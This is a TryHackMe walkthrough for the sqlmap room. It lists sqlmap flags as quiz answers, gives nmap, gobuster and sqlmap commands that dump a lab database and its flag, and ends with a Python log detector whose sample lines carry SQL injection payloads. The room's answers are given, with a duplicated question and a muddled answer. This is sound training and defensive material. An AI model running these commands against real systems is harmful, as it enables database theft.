TryHackMe-Walkthrough-SQLmap
SQLMAP : Learn about and use Sqlmap to exploit the web application
room link :
https://tryhackme.com/room/sqlmap
Let's begin:
Task 1 : Introduction
What is sqlmap?
sqlmap is an open source penetration testing tool developed by Bernardo Damele Assumpcao Guimaraes and Miroslav Stampar that automates the process of detecting and exploiting SQL injection flaws and taking over database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester, and a broad range of switches lasting from database fingerprinting, fetching data from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.
Installing Sqlmap
If you’re using Kali Linux, sqlmap is pre-installed. Otherwise, you can download it here: https://github.com/sqlmapproject/sqlmap
Task 2 : Using SQLmap :
Which flag or option will allow you to add a URL to the command?
Answer : -u
Which flag would you use to add data to a POST request?
Answer : --data
There are two parameters: username and password. How would you tell sqlmap to use the username parameter for the attack?
Answer : -p username
Which flag would you use to show the advanced help menu?
Answer : -hh
Which flag allows you to retrieve everything?
Answer : -a
Which flag allows you to select the database name?
Answer : -D
Which flag would you use to retrieve database tables?
Answer : --tables
Which flag allows you to retrieve a table’s columns?
Answer : --columns
Which flag allows you to dump all the database table entries?
Answer : --dump-all
Which flag will give you an interactive SQL Shell prompt?
Answer : --sql-shell
You know the current db type is ‘MYSQL’. Which flag allows you to enumerate only MySQL databases?
Answer : --dbms=MYSQL
Task 3 : SQLMap Challenge
What is the name of the interesting directory?
Let's start by enumerating the web server using Nmap:
nmap ip_addr -vv
Let's check port 80.
So let's look for other directories with gobuster or dirbuster:
gobuster dir -u 'http://ip_addr/' -w /usr/share/wordlists/rockyou.txt
Answer : blood
Who is the current db user?
Let's first check the directory we found.
Let's try to log in, then use Burp Suite to intercept the login request and save it in file.txt to use with sqlmap:
sqlmap -r file.txt --dbs
We find several databases, so let's check the current one:
sqlmap -r file.txt --current-db
And there we go: the current database is named blood.
Answer : blood
Who is the current db user?
Answer : root
What is the final flag?
Let's use this query:
sqlmap -u "http://10.10.48.187/blood/view.php?id=1" -D blood -T flag --column
Now let's try to get the flag:
sqlmap -u "http://10.10.48.187/blood/view.php?id=1" -D blood -T flag --columns --dbms=mysql
Answer : thm{sqlm@p_is_L0ve}
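From the defender's side, here is an added example of my own (not part of the original walkthrough or the sqlmap project): a small Python check over web server access logs that flags the kind of traffic the commands above generate against /blood/view.php?id=, using sqlmap's default User-Agent string and non-numeric or SQL-looking id values. The log lines are constructed, and the 10.0.0.x addresses and the assumption that id must be an integer are mine.

```python
import re
from collections import Counter, defaultdict
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [time] "METHOD path PROTO" status bytes "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Constructed sample log (not captured from the room): one normal visitor, then a burst from 10.0.0.9.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /blood/view.php?id=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Jan/2024:10:01:00 +0000] "GET /blood/view.php?id=1%27 HTTP/1.1" 500 0 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:01:01 +0000] "GET /blood/view.php?id=1%20AND%201=1 HTTP/1.1" 200 512 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:01:02 +0000] "GET /blood/view.php?id=1%20UNION%20SELECT%20NULL,NULL HTTP/1.1" 200 700 "-" "sqlmap/1.7#stable (https://sqlmap.org)"
10.0.0.9 - - [01/Jan/2024:10:01:03 +0000] "GET /blood/view.php?id=1%20AND%20SLEEP(5) HTTP/1.1" 200 512 "-" "Mozilla/5.0"
"""

# SQL fragments that never belong in a numeric id: keywords, quotes, comment openers.
SQLI_RE = re.compile(r"(?i)\b(union|select|and|or|sleep|benchmark|information_schema)\b|['\"]|--|/\*")

def classify(line):
    """Return (source ip, list of reasons); an empty list means the request looks benign."""
    m = LOG_RE.match(line)
    if not m:
        return None, ["unparseable line"]
    reasons = []
    # The default User-Agent names the tool; it is trivially changed, so treat it as a hint only.
    if "sqlmap" in m["ua"].lower():
        reasons.append("scanner user-agent")
    for value in parse_qs(urlsplit(m["path"]).query).get("id", []):
        if not value.isdigit():          # view.php is assumed to expect an integer id
            reasons.append("non-numeric id")
        if SQLI_RE.search(value):        # decoded value carries SQL syntax
            reasons.append("sql syntax in id")
    return m["ip"], reasons

def suspicious_by_ip(log_text, threshold=3):
    """Count flagged requests per source; return {ip: (count, reasons)} for sources at or over threshold."""
    counts, reasons_by_ip = Counter(), defaultdict(set)
    for line in log_text.splitlines():
        ip, reasons = classify(line)
        if ip and reasons:
            counts[ip] += 1
            reasons_by_ip[ip].update(reasons)
    return {ip: (n, sorted(reasons_by_ip[ip])) for ip, n in counts.items() if n >= threshold}
```

Running suspicious_by_ip(SAMPLE_LOG) reports only 10.0.0.9, with four flagged requests; the single legitimate hit from 10.0.0.5 is not reported.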
Thank you for your feedback and your attention.
#Cybersecurity #SQLInjection #WebAppSecurity #EthicalHacking #TryHackMe #MediumArticle #FeedbackWelcome